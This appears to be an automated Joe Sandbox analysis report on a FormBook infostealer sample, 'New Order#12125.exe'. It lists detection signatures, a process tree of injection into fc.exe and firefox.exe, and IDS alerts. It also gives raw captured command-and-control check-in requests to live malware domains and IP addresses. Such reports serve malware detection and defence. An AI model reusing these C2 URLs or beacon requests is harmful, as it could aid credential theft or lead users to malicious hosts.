Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Order#12125.exe

Overview

General Information

Sample name:New Order#12125.exe
Analysis ID:1590082
MD5:2a0dfbfc319b0082f4fcdc47317e7f23
SHA1:82f2785464db11931b8653f349a7d0b62502c1c5
SHA256:a117f2f0d37c6e467b308cb625140d64edab045f59a422c2c7ae671098a52748
Tags:exeuser-James_inthe_box
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • New Order#12125.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\New Order#12125.exe" MD5: 2A0DFBFC319B0082F4FCDC47317E7F23)
    • XcmmvCqVSCAb.exe (PID: 5780 cmdline: "C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • fc.exe (PID: 7808 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
        • XcmmvCqVSCAb.exe (PID: 1484 cmdline: "C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 8060 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1802187865.0000000001470000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.3862175429.0000000003340000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3862316494.0000000003390000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.3849108726.0000000002E50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.New Order#12125.exe.290000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T15:11:05.274132+010020507451Malware Command and Control Activity Detected192.168.2.849757154.39.239.23780TCP
              2025-01-13T15:12:05.118293+010020507451Malware Command and Control Activity Detected192.168.2.84970747.83.1.9080TCP
              2025-01-13T15:12:28.332119+010020507451Malware Command and Control Activity Detected192.168.2.84971384.32.84.3280TCP
              2025-01-13T15:12:41.679730+010020507451Malware Command and Control Activity Detected192.168.2.849717104.21.18.17180TCP
              2025-01-13T15:12:56.296137+010020507451Malware Command and Control Activity Detected192.168.2.849721134.122.135.4880TCP
              2025-01-13T15:13:09.725455+010020507451Malware Command and Control Activity Detected192.168.2.849725199.192.21.16980TCP
              2025-01-13T15:13:23.337048+010020507451Malware Command and Control Activity Detected192.168.2.849729154.197.162.23980TCP
              2025-01-13T15:13:36.621759+010020507451Malware Command and Control Activity Detected192.168.2.84973384.32.84.3280TCP
              2025-01-13T15:13:51.067776+010020507451Malware Command and Control Activity Detected192.168.2.849737134.122.135.4880TCP
              2025-01-13T15:14:05.590151+010020507451Malware Command and Control Activity Detected192.168.2.84974147.83.1.9080TCP
              2025-01-13T15:14:18.811617+010020507451Malware Command and Control Activity Detected192.168.2.849745188.114.96.380TCP
              2025-01-13T15:14:40.163362+010020507451Malware Command and Control Activity Detected192.168.2.849749199.59.243.22880TCP
              2025-01-13T15:14:53.914854+010020507451Malware Command and Control Activity Detected192.168.2.84975313.228.81.3980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T15:11:05.274132+010028554651A Network Trojan was detected192.168.2.849757154.39.239.23780TCP
              2025-01-13T15:12:05.118293+010028554651A Network Trojan was detected192.168.2.84970747.83.1.9080TCP
              2025-01-13T15:12:28.332119+010028554651A Network Trojan was detected192.168.2.84971384.32.84.3280TCP
              2025-01-13T15:12:41.679730+010028554651A Network Trojan was detected192.168.2.849717104.21.18.17180TCP
              2025-01-13T15:12:56.296137+010028554651A Network Trojan was detected192.168.2.849721134.122.135.4880TCP
              2025-01-13T15:13:09.725455+010028554651A Network Trojan was detected192.168.2.849725199.192.21.16980TCP
              2025-01-13T15:13:23.337048+010028554651A Network Trojan was detected192.168.2.849729154.197.162.23980TCP
              2025-01-13T15:13:36.621759+010028554651A Network Trojan was detected192.168.2.84973384.32.84.3280TCP
              2025-01-13T15:13:51.067776+010028554651A Network Trojan was detected192.168.2.849737134.122.135.4880TCP
              2025-01-13T15:14:05.590151+010028554651A Network Trojan was detected192.168.2.84974147.83.1.9080TCP
              2025-01-13T15:14:18.811617+010028554651A Network Trojan was detected192.168.2.849745188.114.96.380TCP
              2025-01-13T15:14:40.163362+010028554651A Network Trojan was detected192.168.2.849749199.59.243.22880TCP
              2025-01-13T15:14:53.914854+010028554651A Network Trojan was detected192.168.2.84975313.228.81.3980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T15:12:20.715447+010028554641A Network Trojan was detected192.168.2.84970984.32.84.3280TCP
              2025-01-13T15:12:23.239953+010028554641A Network Trojan was detected192.168.2.84971084.32.84.3280TCP
              2025-01-13T15:12:25.783859+010028554641A Network Trojan was detected192.168.2.84971184.32.84.3280TCP
              2025-01-13T15:12:34.038776+010028554641A Network Trojan was detected192.168.2.849714104.21.18.17180TCP
              2025-01-13T15:12:36.592127+010028554641A Network Trojan was detected192.168.2.849715104.21.18.17180TCP
              2025-01-13T15:12:39.118648+010028554641A Network Trojan was detected192.168.2.849716104.21.18.17180TCP
              2025-01-13T15:12:48.675328+010028554641A Network Trojan was detected192.168.2.849718134.122.135.4880TCP
              2025-01-13T15:12:51.250228+010028554641A Network Trojan was detected192.168.2.849719134.122.135.4880TCP
              2025-01-13T15:12:53.779143+010028554641A Network Trojan was detected192.168.2.849720134.122.135.4880TCP
              2025-01-13T15:13:02.050209+010028554641A Network Trojan was detected192.168.2.849722199.192.21.16980TCP
              2025-01-13T15:13:04.656922+010028554641A Network Trojan was detected192.168.2.849723199.192.21.16980TCP
              2025-01-13T15:13:07.261861+010028554641A Network Trojan was detected192.168.2.849724199.192.21.16980TCP
              2025-01-13T15:13:15.727465+010028554641A Network Trojan was detected192.168.2.849726154.197.162.23980TCP
              2025-01-13T15:13:18.241415+010028554641A Network Trojan was detected192.168.2.849727154.197.162.23980TCP
              2025-01-13T15:13:20.807234+010028554641A Network Trojan was detected192.168.2.849728154.197.162.23980TCP
              2025-01-13T15:13:28.960302+010028554641A Network Trojan was detected192.168.2.84973084.32.84.3280TCP
              2025-01-13T15:13:31.543843+010028554641A Network Trojan was detected192.168.2.84973184.32.84.3280TCP
              2025-01-13T15:13:34.062236+010028554641A Network Trojan was detected192.168.2.84973284.32.84.3280TCP
              2025-01-13T15:13:43.445036+010028554641A Network Trojan was detected192.168.2.849734134.122.135.4880TCP
              2025-01-13T15:13:46.013616+010028554641A Network Trojan was detected192.168.2.849735134.122.135.4880TCP
              2025-01-13T15:13:48.567336+010028554641A Network Trojan was detected192.168.2.849736134.122.135.4880TCP
              2025-01-13T15:13:57.643124+010028554641A Network Trojan was detected192.168.2.84973847.83.1.9080TCP
              2025-01-13T15:14:00.279215+010028554641A Network Trojan was detected192.168.2.84973947.83.1.9080TCP
              2025-01-13T15:14:02.901606+010028554641A Network Trojan was detected192.168.2.84974047.83.1.9080TCP
              2025-01-13T15:14:11.180458+010028554641A Network Trojan was detected192.168.2.849742188.114.96.380TCP
              2025-01-13T15:14:13.790127+010028554641A Network Trojan was detected192.168.2.849743188.114.96.380TCP
              2025-01-13T15:14:16.279625+010028554641A Network Trojan was detected192.168.2.849744188.114.96.380TCP
              2025-01-13T15:14:32.502742+010028554641A Network Trojan was detected192.168.2.849746199.59.243.22880TCP
              2025-01-13T15:14:35.068885+010028554641A Network Trojan was detected192.168.2.849747199.59.243.22880TCP
              2025-01-13T15:14:37.604204+010028554641A Network Trojan was detected192.168.2.849748199.59.243.22880TCP
              2025-01-13T15:14:46.757752+010028554641A Network Trojan was detected192.168.2.84975013.228.81.3980TCP
              2025-01-13T15:14:49.304835+010028554641A Network Trojan was detected192.168.2.84975113.228.81.3980TCP
              2025-01-13T15:14:51.335771+010028554641A Network Trojan was detected192.168.2.84975213.228.81.3980TCP
              2025-01-13T15:15:02.353998+010028554641A Network Trojan was detected192.168.2.849754154.39.239.23780TCP
              2025-01-13T15:15:04.898313+010028554641A Network Trojan was detected192.168.2.849755154.39.239.23780TCP
              2025-01-13T15:15:07.445198+010028554641A Network Trojan was detected192.168.2.849756154.39.239.23780TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: New Order#12125.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://www.gayhxi.info/k2i2/?60q4=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYF/WObEBiJBWRMbpDnW8pt5wghpp2/wZ5fkXlTj7vN//Tw==&XxGx=INH0eLohAvira URL Cloud: Label: malware
              Source: http://www.adadev.info/ctdy/Avira URL Cloud: Label: malware
              Source: http://www.adadev.info/ctdy/?XxGx=INH0eLoh&60q4=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZFRMH0zJP+kybsKdAAfaCKHAM6Zo7ldb4F8fWSMfSKwbdMw==Avira URL Cloud: Label: malware
              Multi AV Scanner detection for submitted file
              Source: New Order#12125.exeVirustotal: Detection: 65%Perma Link
              Source: New Order#12125.exeReversingLabs: Detection: 71%
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.New Order#12125.exe.290000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1802187865.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3862175429.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3862316494.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3849108726.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3862461350.0000000003C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1805331540.00000000022F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: New Order#12125.exeJoe Sandbox ML: detected
              Source: New Order#12125.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: New Order#12125.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: New Order#12125.exe, 00000000.00000003.1801698818.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3857137483.00000000013D8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: New Order#12125.exe, 00000000.00000003.1801698818.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3857137483.00000000013D8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XcmmvCqVSCAb.exe, 00000003.00000000.1721505934.000000000001E000.00000002.00000001.01000000.00000005.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3849029999.000000000001E000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: New Order#12125.exe, 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000002.1802265375.000000000166E000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1705156829.0000000001321000.00000004.00000020.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1702526408.000000000117C000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3862729479.000000000384E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1801920951.0000000003347000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1803992712.00000000034FD000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3862729479.00000000036B0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: New Order#12125.exe, New Order#12125.exe, 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000002.1802265375.000000000166E000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1705156829.0000000001321000.00000004.00000020.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1702526408.000000000117C000.00000004.00000020.00020000.00000000.sdmp, fc.exe, fc.exe, 00000004.00000002.3862729479.000000000384E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1801920951.0000000003347000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1803992712.00000000034FD000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3862729479.00000000036B0000.00000040.00001000.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E6C870 FindFirstFileW,FindNextFileW,FindClose,4_2_02E6C870
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then xor eax, eax4_2_02E59EC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then pop edi4_2_02E5E4C7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then mov ebx, 00000004h4_2_034904CE
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then mov ebx, 00000004h9_2_0000023F860684CE

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49709 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49741 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49741 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49710 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49713 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49713 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49738 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49731 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49725 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49725 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49753 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49753 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49734 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49755 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49736 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49748 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49716 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49733 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49733 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49740 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49743 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49720 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49729 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49729 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49732 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49717 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49717 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49749 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49749 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49744 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49707 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49707 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49746 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49722 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49756 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49711 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49750 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49718 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49726 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49747 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49752 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49754 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49735 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49728 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49721 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49721 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49724 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49730 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49742 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49737 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49737 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49739 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49745 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49745 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49751 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49757 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49757 -> 154.39.239.237:80
              Source: Joe Sandbox ViewIP Address: 154.197.162.239 154.197.162.239
              Source: Joe Sandbox ViewIP Address: 104.21.18.171 104.21.18.171
              Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /k2i2/?60q4=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYF/WObEBiJBWRMbpDnW8pt5wghpp2/wZ5fkXlTj7vN//Tw==&XxGx=INH0eLoh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gayhxi.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /zaz4/?60q4=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhhp4qHBhxLTG4/9m9WNTMgvCUOuzK4Dd8hoTr25U9f7tIQ==&XxGx=INH0eLoh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.promocao.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
